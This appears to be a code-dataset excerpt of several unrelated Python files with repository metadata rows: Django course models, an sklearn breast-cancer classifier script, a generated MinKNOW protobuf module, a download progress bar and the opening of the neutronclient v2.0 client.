if not self.slug:
self.slug = slugify(self.title)
super().save(*args, **kwargs)
def get_absolute_url(self) -> str:
return reverse("course:course-detail", kwargs={"slug": self.slug})
def get_edit_url(self) -> str:
return reverse("course:edit-course", kwargs={"course_id": self.pk })
class CourseImage(models.Model):
def get_upload_to(instance, filename):
return f"course-images/{instance.course.date_created.year}/{instance.course.slug}/{filename}"
course = models.ForeignKey(Course, related_name="images", on_delete=models.CASCADE)
image = models.ImageField(upload_to=get_upload_to)
date_created = models.DateTimeField(auto_now_add=True)
last_modified = models.DateTimeField(auto_now=True)
class Meta:
ordering = ("-date_created",)
def get_absolute_url(self):
return self.image.url
class Episode(models.Model):
course = models.ForeignKey(
Course, related_name="episodes", on_delete=models.CASCADE
)
title = models.CharField(max_length=250)
slug = models.SlugField(blank=True)
youtube_video = models.URLField(blank=True, null=True)
description = models.TextField()
date_created = models.DateTimeField(auto_now_add=True)
last_modified = models.DateTimeField(auto_now=True)
class Meta:
ordering = ("date_created",)
def __str__(self) -> str:
return self.title
def __repr__(self) -> str:
return f"<Episode: {self.title[:30]}>"
def save(self, *args, **kwargs) -> None:
if not self.slug:
self.slug = slugify(self.title)
super().save(*args, **kwargs)
def get_absolute_url(self) -> str:
return reverse("course:episode-detail", kwargs={"pk": self.pk})
def get_edit_url(self) -> str:
return reverse("course:edit-episode", kwargs={"slug": self.course.slug, "episode_id": self.pk })
def next(self) -> "Episode":
return self.course.episodes.filter(date_created__gt=self.date_created).first()
def prev(self) -> "Episode":
return self.course.episodes.filter(date_created__lt=self.date_created).last()
class Step(models.Model):
episode = models.ForeignKey(
Episode, related_name="steps", on_delete=models.CASCADE, blank=True, null=True
)
title = models.CharField(max_length=250)
timestamp = models.TimeField(null=True, blank=True)
content = models.TextField(
help_text="This uses markdown format"
)
date_created = models.DateTimeField(auto_now_add=True)
last_modified = models.DateTimeField(auto_now=True)
class Meta:
ordering = ("date_created",)
def __str__(self):
return self.title
def get_edit_url(self) -> str:
return reverse("course:edit-step", kwargs={"slug": self.episode.course.slug, "episode_id": self.episode.pk, "step_id": self.pk})
class EpisodeComment(models.Model):
user = models.ForeignKey(
User, related_name="episode_comments", on_delete=models.CASCADE
)
episode = models.ForeignKey(
Episode, related_name="comments", on_delete=models.CASCADE
)
comment = models.TextField()
date_created = models.DateTimeField(auto_now_add=True)
last_modified = models.DateTimeField(auto_now=True)
class Meta:
ordering = ("-date_created",)
def __str__(self) -> str:
return self.comment
| 31.55 | 136 | 0.66878 | 549 | 4,417 | 5.182149 | 0.204007 | 0.057996 | 0.080844 | 0.091388 | 0.620035 | 0.535677 | 0.467135 | 0.467135 | 0.44464 | 0.372935 | 0 | 0.003708 | 0.206249 | 4,417 | 139 | 137 | 31.776978 | 0.807758 | 0.017433 | 0 | 0.45098 | 0 | 0 | 0.108445 | 0.029303 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.039216 | 0.147059 | 0.735294 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 2 |
e0197c1d3a305e381283bd32e4ebc39f3db663dc | 3,707 | py | Python | learning_sklearn/cancer.py | SeanSyue/SklearnReferences | a2770a7108947877e772f3525bc915c5de4114bb | [
"MIT"
] | null | null | null | learning_sklearn/cancer.py | SeanSyue/SklearnReferences | a2770a7108947877e772f3525bc915c5de4114bb | [
"MIT"
] | null | null | null | learning_sklearn/cancer.py | SeanSyue/SklearnReferences | a2770a7108947877e772f3525bc915c5de4114bb | [
"MIT"
] | null | null | null | from sklearn.datasets import load_breast_cancer
cancer = load_breast_cancer()
print(cancer.keys())
print(type(cancer.keys()))
# print(cancer['DESCR'])
print(cancer['data'].shape) # Return array dim in tuple form.
X = cancer['data']
y = cancer['target']
# Split arrays or matrices into random train and test subsets
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# +++++++++++++++++++++++++++++++++++++Standardization++++++++++++++++++++++++++++++++
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
from sklearn.preprocessing import StandardScaler
scaler = StandardScaler()
# Fit only to the training data
scaler.fit(X_train)
print(scaler.fit(X_train), "\n")
# Now apply the transformations to the data:
X_train = scaler.transform(X_train)
X_test = scaler.transform(X_test)
print("type(X_train):", type(X_train)) # <class 'numpy.ndarray'>
print("type(X_test):", type(X_test)) # <class 'numpy.ndarray'>
print("type(y_train):", type(y_train)) # <class 'numpy.ndarray'>
print("type(y_test):", type(y_test)) # <class 'numpy.ndarray'>
print("X_train.shape:", X_train.shape)
print("X_test.shape:", X_test.shape)
print("y_train.shape:", y_train.shape)
print("y_test.shape:", y_test.shape, "\n") # Not using len()
# +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# ++++++++++++++++++++++++++++++++++++Training+++++++++++++++++++++++++++++++++++++++++
# +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
from sklearn.neural_network import MLPClassifier
mlp = MLPClassifier(hidden_layer_sizes=(30, 30, 30)) # 3 layers with the same number of neurons
mlp.fit(X_train, y_train)
print(mlp.fit(X_train, y_train), "\n")
# +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# ++++++++++++++++++++++++++++++++++++Prediction+++++++++++++++++++++++++++++++++++++++++
# +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
predictions = mlp.predict(X_test)
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# ++++++++++++++++++++++++++++++++++Evaluation++++++++++++++++++++++++++++++++++++++++++++++++
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
from sklearn.metrics import classification_report, confusion_matrix
print("++++++++++++++++++++Evaluation++++++++++++++++++++")
print("confusion_matrix: \n", confusion_matrix(y_test, predictions))
print("--------------------------------------------------")
print("classification_report: \n", classification_report(y_test, predictions))
from sklearn.model_selection import cross_val_score
print("cross_val_score: \n", cross_val_score(mlp, X, y, cv=5))
# ++++++++++++++++++++Weights and biases++++++++++++++++++++
# coefs_ is a list of weight matrices
# intercepts_ is a list of bias vectors
# print("00000000000000000000000000000000000000000000000000000")
# print(mlp.coefs_)
# print("----------------------------------------------------")
# print(mlp.coefs_[0])
# print("----------------------------------------------------")
# print(mlp.intercepts_[0])
# print("----------------------------------------------------")
# print(len(mlp.coefs_))
# print("----------------------------------------------------")
# print(len(mlp.coefs_[0]))
# print("----------------------------------------------------")
# print(len(mlp.intercepts_[0]))
| 48.776316 | 97 | 0.446722 | 333 | 3,707 | 4.768769 | 0.294294 | 0.041562 | 0.02267 | 0.055416 | 0.187028 | 0.079345 | 0 | 0 | 0 | 0 | 0 | 0.020095 | 0.087132 | 3,707 | 75 | 98 | 49.426667 | 0.449173 | 0.55112 | 0 | 0 | 0 | 0 | 0.188387 | 0.07871 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.171429 | 0 | 0.171429 | 0.514286 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |
e01f028d78e068a7b601028f142459ed618d069a | 17,518 | py | Python | porerefiner/protocols/minknow/rpc/manager_pb2.py | CFSAN-Biostatistics/porerefiner | 64f96498bd6c036cfac46def1d9d94362001e67c | [
"MIT"
] | 8 | 2019-10-10T20:05:18.000Z | 2021-02-19T21:53:43.000Z | porerefiner/protocols/minknow/rpc/manager_pb2.py | CFSAN-Biostatistics/porerefiner | 64f96498bd6c036cfac46def1d9d94362001e67c | [
"MIT"
] | 2 | 2020-07-17T07:24:17.000Z | 2021-02-19T22:28:12.000Z | porerefiner/protocols/minknow/rpc/manager_pb2.py | CFSAN-Biostatistics/porerefiner | 64f96498bd6c036cfac46def1d9d94362001e67c | [
"MIT"
] | 2 | 2019-10-01T15:45:59.000Z | 2019-10-28T19:15:32.000Z | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: minknow/rpc/manager.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from . import instance_pb2 as minknow_dot_rpc_dot_instance__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='minknow/rpc/manager.proto',
package='ont.rpc.manager',
syntax='proto3',
serialized_options=None,
serialized_pb=_b('\n\x19minknow/rpc/manager.proto\x12\x0font.rpc.manager\x1a\x1aminknow/rpc/instance.proto\"\x14\n\x12ListDevicesRequest\"\xb3\x03\n\x13ListDevicesResponse\x12\x10\n\x08inactive\x18\x01 \x03(\t\x12\x0f\n\x07pending\x18\x02 \x03(\t\x12\x41\n\x06\x61\x63tive\x18\x03 \x03(\x0b\x32\x31.ont.rpc.manager.ListDevicesResponse.ActiveDevice\x1ap\n\x08RpcPorts\x12\x0f\n\x07jsonrpc\x18\x01 \x01(\r\x12\x16\n\x0ejson_websocket\x18\x02 \x01(\r\x12\x0e\n\x06secure\x18\x03 \x01(\r\x12\x15\n\rinsecure_grpc\x18\x04 \x01(\r\x12\x14\n\x0cinsecure_web\x18\x05 \x01(\r\x1a$\n\x0c\x44\x65viceLayout\x12\t\n\x01x\x18\x01 \x01(\x05\x12\t\n\x01y\x18\x02 \x01(\x05\x1a\x9d\x01\n\x0c\x41\x63tiveDevice\x12\x0c\n\x04name\x18\x01 \x01(\t\x12<\n\x05ports\x18\x02 \x01(\x0b\x32-.ont.rpc.manager.ListDevicesResponse.RpcPorts\x12\x41\n\x06layout\x18\x03 \x01(\x0b\x32\x31.ont.rpc.manager.ListDevicesResponse.DeviceLayout\"\x17\n\x15GetVersionInfoRequest\"\xab\x02\n\x16GetVersionInfoResponse\x12H\n\x07minknow\x18\x01 \x01(\x0b\x32\x37.ont.rpc.instance.GetVersionInfoResponse.MinknowVersion\x12\x11\n\tprotocols\x18\x02 \x01(\t\x12\x1c\n\x14\x64istribution_version\x18\x03 \x01(\t\x12X\n\x13\x64istribution_status\x18\x04 \x01(\x0e\x32;.ont.rpc.instance.GetVersionInfoResponse.DistributionStatus\x12\x1b\n\x13guppy_build_version\x18\x05 \x01(\t\x12\x1f\n\x17guppy_connected_version\x18\x06 \x01(\t2\xd4\x01\n\x0eManagerService\x12[\n\x0clist_devices\x12#.ont.rpc.manager.ListDevicesRequest\x1a$.ont.rpc.manager.ListDevicesResponse\"\x00\x12\x65\n\x10get_version_info\x12&.ont.rpc.manager.GetVersionInfoRequest\x1a\'.ont.rpc.manager.GetVersionInfoResponse\"\x00\x62\x06proto3')
,
dependencies=[minknow_dot_rpc_dot_instance__pb2.DESCRIPTOR,])
_LISTDEVICESREQUEST = _descriptor.Descriptor(
name='ListDevicesRequest',
full_name='ont.rpc.manager.ListDevicesRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=74,
serialized_end=94,
)
_LISTDEVICESRESPONSE_RPCPORTS = _descriptor.Descriptor(
name='RpcPorts',
full_name='ont.rpc.manager.ListDevicesResponse.RpcPorts',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='jsonrpc', full_name='ont.rpc.manager.ListDevicesResponse.RpcPorts.jsonrpc', index=0,
number=1, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='json_websocket', full_name='ont.rpc.manager.ListDevicesResponse.RpcPorts.json_websocket', index=1,
number=2, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='secure', full_name='ont.rpc.manager.ListDevicesResponse.RpcPorts.secure', index=2,
number=3, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='insecure_grpc', full_name='ont.rpc.manager.ListDevicesResponse.RpcPorts.insecure_grpc', index=3,
number=4, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='insecure_web', full_name='ont.rpc.manager.ListDevicesResponse.RpcPorts.insecure_web', index=4,
number=5, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=222,
serialized_end=334,
)
_LISTDEVICESRESPONSE_DEVICELAYOUT = _descriptor.Descriptor(
name='DeviceLayout',
full_name='ont.rpc.manager.ListDevicesResponse.DeviceLayout',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='x', full_name='ont.rpc.manager.ListDevicesResponse.DeviceLayout.x', index=0,
number=1, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='y', full_name='ont.rpc.manager.ListDevicesResponse.DeviceLayout.y', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=336,
serialized_end=372,
)
_LISTDEVICESRESPONSE_ACTIVEDEVICE = _descriptor.Descriptor(
name='ActiveDevice',
full_name='ont.rpc.manager.ListDevicesResponse.ActiveDevice',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='ont.rpc.manager.ListDevicesResponse.ActiveDevice.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='ports', full_name='ont.rpc.manager.ListDevicesResponse.ActiveDevice.ports', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='layout', full_name='ont.rpc.manager.ListDevicesResponse.ActiveDevice.layout', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=375,
serialized_end=532,
)
_LISTDEVICESRESPONSE = _descriptor.Descriptor(
name='ListDevicesResponse',
full_name='ont.rpc.manager.ListDevicesResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='inactive', full_name='ont.rpc.manager.ListDevicesResponse.inactive', index=0,
number=1, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='pending', full_name='ont.rpc.manager.ListDevicesResponse.pending', index=1,
number=2, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='active', full_name='ont.rpc.manager.ListDevicesResponse.active', index=2,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_LISTDEVICESRESPONSE_RPCPORTS, _LISTDEVICESRESPONSE_DEVICELAYOUT, _LISTDEVICESRESPONSE_ACTIVEDEVICE, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=97,
serialized_end=532,
)
_GETVERSIONINFOREQUEST = _descriptor.Descriptor(
name='GetVersionInfoRequest',
full_name='ont.rpc.manager.GetVersionInfoRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=534,
serialized_end=557,
)
_GETVERSIONINFORESPONSE = _descriptor.Descriptor(
name='GetVersionInfoResponse',
full_name='ont.rpc.manager.GetVersionInfoResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='minknow', full_name='ont.rpc.manager.GetVersionInfoResponse.minknow', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='protocols', full_name='ont.rpc.manager.GetVersionInfoResponse.protocols', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='distribution_version', full_name='ont.rpc.manager.GetVersionInfoResponse.distribution_version', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='distribution_status', full_name='ont.rpc.manager.GetVersionInfoResponse.distribution_status', index=3,
number=4, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='guppy_build_version', full_name='ont.rpc.manager.GetVersionInfoResponse.guppy_build_version', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='guppy_connected_version', full_name='ont.rpc.manager.GetVersionInfoResponse.guppy_connected_version', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=560,
serialized_end=859,
)
_LISTDEVICESRESPONSE_RPCPORTS.containing_type = _LISTDEVICESRESPONSE
_LISTDEVICESRESPONSE_DEVICELAYOUT.containing_type = _LISTDEVICESRESPONSE
_LISTDEVICESRESPONSE_ACTIVEDEVICE.fields_by_name['ports'].message_type = _LISTDEVICESRESPONSE_RPCPORTS
_LISTDEVICESRESPONSE_ACTIVEDEVICE.fields_by_name['layout'].message_type = _LISTDEVICESRESPONSE_DEVICELAYOUT
_LISTDEVICESRESPONSE_ACTIVEDEVICE.containing_type = _LISTDEVICESRESPONSE
_LISTDEVICESRESPONSE.fields_by_name['active'].message_type = _LISTDEVICESRESPONSE_ACTIVEDEVICE
_GETVERSIONINFORESPONSE.fields_by_name['minknow'].message_type = minknow_dot_rpc_dot_instance__pb2._GETVERSIONINFORESPONSE_MINKNOWVERSION
_GETVERSIONINFORESPONSE.fields_by_name['distribution_status'].enum_type = minknow_dot_rpc_dot_instance__pb2._GETVERSIONINFORESPONSE_DISTRIBUTIONSTATUS
DESCRIPTOR.message_types_by_name['ListDevicesRequest'] = _LISTDEVICESREQUEST
DESCRIPTOR.message_types_by_name['ListDevicesResponse'] = _LISTDEVICESRESPONSE
DESCRIPTOR.message_types_by_name['GetVersionInfoRequest'] = _GETVERSIONINFOREQUEST
DESCRIPTOR.message_types_by_name['GetVersionInfoResponse'] = _GETVERSIONINFORESPONSE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
ListDevicesRequest = _reflection.GeneratedProtocolMessageType('ListDevicesRequest', (_message.Message,), {
'DESCRIPTOR' : _LISTDEVICESREQUEST,
'__module__' : 'minknow.rpc.manager_pb2'
# @@protoc_insertion_point(class_scope:ont.rpc.manager.ListDevicesRequest)
})
_sym_db.RegisterMessage(ListDevicesRequest)
ListDevicesResponse = _reflection.GeneratedProtocolMessageType('ListDevicesResponse', (_message.Message,), {
'RpcPorts' : _reflection.GeneratedProtocolMessageType('RpcPorts', (_message.Message,), {
'DESCRIPTOR' : _LISTDEVICESRESPONSE_RPCPORTS,
'__module__' : 'minknow.rpc.manager_pb2'
# @@protoc_insertion_point(class_scope:ont.rpc.manager.ListDevicesResponse.RpcPorts)
})
,
'DeviceLayout' : _reflection.GeneratedProtocolMessageType('DeviceLayout', (_message.Message,), {
'DESCRIPTOR' : _LISTDEVICESRESPONSE_DEVICELAYOUT,
'__module__' : 'minknow.rpc.manager_pb2'
# @@protoc_insertion_point(class_scope:ont.rpc.manager.ListDevicesResponse.DeviceLayout)
})
,
'ActiveDevice' : _reflection.GeneratedProtocolMessageType('ActiveDevice', (_message.Message,), {
'DESCRIPTOR' : _LISTDEVICESRESPONSE_ACTIVEDEVICE,
'__module__' : 'minknow.rpc.manager_pb2'
# @@protoc_insertion_point(class_scope:ont.rpc.manager.ListDevicesResponse.ActiveDevice)
})
,
'DESCRIPTOR' : _LISTDEVICESRESPONSE,
'__module__' : 'minknow.rpc.manager_pb2'
# @@protoc_insertion_point(class_scope:ont.rpc.manager.ListDevicesResponse)
})
_sym_db.RegisterMessage(ListDevicesResponse)
_sym_db.RegisterMessage(ListDevicesResponse.RpcPorts)
_sym_db.RegisterMessage(ListDevicesResponse.DeviceLayout)
_sym_db.RegisterMessage(ListDevicesResponse.ActiveDevice)
GetVersionInfoRequest = _reflection.GeneratedProtocolMessageType('GetVersionInfoRequest', (_message.Message,), {
'DESCRIPTOR' : _GETVERSIONINFOREQUEST,
'__module__' : 'minknow.rpc.manager_pb2'
# @@protoc_insertion_point(class_scope:ont.rpc.manager.GetVersionInfoRequest)
})
_sym_db.RegisterMessage(GetVersionInfoRequest)
GetVersionInfoResponse = _reflection.GeneratedProtocolMessageType('GetVersionInfoResponse', (_message.Message,), {
'DESCRIPTOR' : _GETVERSIONINFORESPONSE,
'__module__' : 'minknow.rpc.manager_pb2'
# @@protoc_insertion_point(class_scope:ont.rpc.manager.GetVersionInfoResponse)
})
_sym_db.RegisterMessage(GetVersionInfoResponse)
_MANAGERSERVICE = _descriptor.ServiceDescriptor(
name='ManagerService',
full_name='ont.rpc.manager.ManagerService',
file=DESCRIPTOR,
index=0,
serialized_options=None,
serialized_start=862,
serialized_end=1074,
methods=[
_descriptor.MethodDescriptor(
name='list_devices',
full_name='ont.rpc.manager.ManagerService.list_devices',
index=0,
containing_service=None,
input_type=_LISTDEVICESREQUEST,
output_type=_LISTDEVICESRESPONSE,
serialized_options=None,
),
_descriptor.MethodDescriptor(
name='get_version_info',
full_name='ont.rpc.manager.ManagerService.get_version_info',
index=1,
containing_service=None,
input_type=_GETVERSIONINFOREQUEST,
output_type=_GETVERSIONINFORESPONSE,
serialized_options=None,
),
])
_sym_db.RegisterServiceDescriptor(_MANAGERSERVICE)
DESCRIPTOR.services_by_name['ManagerService'] = _MANAGERSERVICE
# @@protoc_insertion_point(module_scope)
| 40.834499 | 1,664 | 0.763843 | 2,053 | 17,518 | 6.232343 | 0.113005 | 0.040016 | 0.044705 | 0.031731 | 0.609222 | 0.559672 | 0.528878 | 0.464088 | 0.438453 | 0.438453 | 0 | 0.032531 | 0.115595 | 17,518 | 428 | 1,665 | 40.929907 | 0.793326 | 0.042356 | 0 | 0.614583 | 1 | 0.028646 | 0.240231 | 0.197101 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.015625 | 0 | 0.015625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
e0260412b464ac4926f1812a3fc79f361d47a7f5 | 496 | py | Python | autoscalingsim/utils/download_bar.py | Remit/autoscaling-simulator | 091943c0e9eedf9543e9305682a067ab60f56def | [
"MIT"
] | 6 | 2021-03-10T16:23:10.000Z | 2022-01-14T04:57:46.000Z | autoscalingsim/utils/download_bar.py | Remit/autoscaling-simulator | 091943c0e9eedf9543e9305682a067ab60f56def | [
"MIT"
] | null | null | null | autoscalingsim/utils/download_bar.py | Remit/autoscaling-simulator | 091943c0e9eedf9543e9305682a067ab60f56def | [
"MIT"
] | 1 | 2022-01-14T04:57:55.000Z | 2022-01-14T04:57:55.000Z | import progressbar
class DownloadProgressBar:
def __init__(self):
self.progress_bar = None
def __call__(self, block_num, block_size, total_size):
if not self.progress_bar:
self.progress_bar = progressbar.ProgressBar(maxval=total_size)
self.progress_bar.start()
downloaded = block_num * block_size
if downloaded < total_size:
self.progress_bar.update(downloaded)
else:
self.progress_bar.finish()
| 26.105263 | 74 | 0.655242 | 56 | 496 | 5.428571 | 0.410714 | 0.236842 | 0.296053 | 0.111842 | 0.157895 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.270161 | 496 | 18 | 75 | 27.555556 | 0.839779 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.153846 | false | 0 | 0.076923 | 0 | 0.307692 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
e02a7964963a34fc407350ed7b1945ac2315a225 | 111,394 | py | Python | neutronclient/v2_0/client.py | teresa-ho/stx-python-neutronclient | 35ea6c2c96cbf98755a82cb7c19138648552b778 | [
"Apache-2.0"
] | null | null | null | neutronclient/v2_0/client.py | teresa-ho/stx-python-neutronclient | 35ea6c2c96cbf98755a82cb7c19138648552b778 | [
"Apache-2.0"
] | null | null | null | neutronclient/v2_0/client.py | teresa-ho/stx-python-neutronclient | 35ea6c2c96cbf98755a82cb7c19138648552b778 | [
"Apache-2.0"
] | null | null | null | # Copyright 2012 OpenStack Foundation.
# Copyright 2015 Hewlett-Packard Development Company, L.P.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import inspect
import itertools
import logging
import re
import time
import debtcollector.renames
from keystoneauth1 import exceptions as ksa_exc
import requests
import six.moves.urllib.parse as urlparse
from six import string_types
from neutronclient._i18n import _
from neutronclient import client
from neutronclient.common import exceptions
from neutronclient.common import extension as client_extension
from neutronclient.common import serializer
from neutronclient.common import utils
_logger = logging.getLogger(__name__)
HEX_ELEM = '[0-9A-Fa-f]'
UUID_PATTERN = '-'.join([HEX_ELEM + '{8}', HEX_ELEM + '{4}',
HEX_ELEM + '{4}', HEX_ELEM + '{4}',
HEX_ELEM + '{12}'])
def exception_handler_v20(status_code, error_content):
"""Exception handler for API v2.0 client.
This routine generates the appropriate Neutron exception according to
the contents of the response body.
:param status_code: HTTP error status code
:param error_content: deserialized body of error response
"""
error_dict = None
request_ids = error_content.request_ids
if isinstance(error_content, dict):
error_dict = error_content.get('NeutronError')
# Find real error type
client_exc = None
if error_dict:
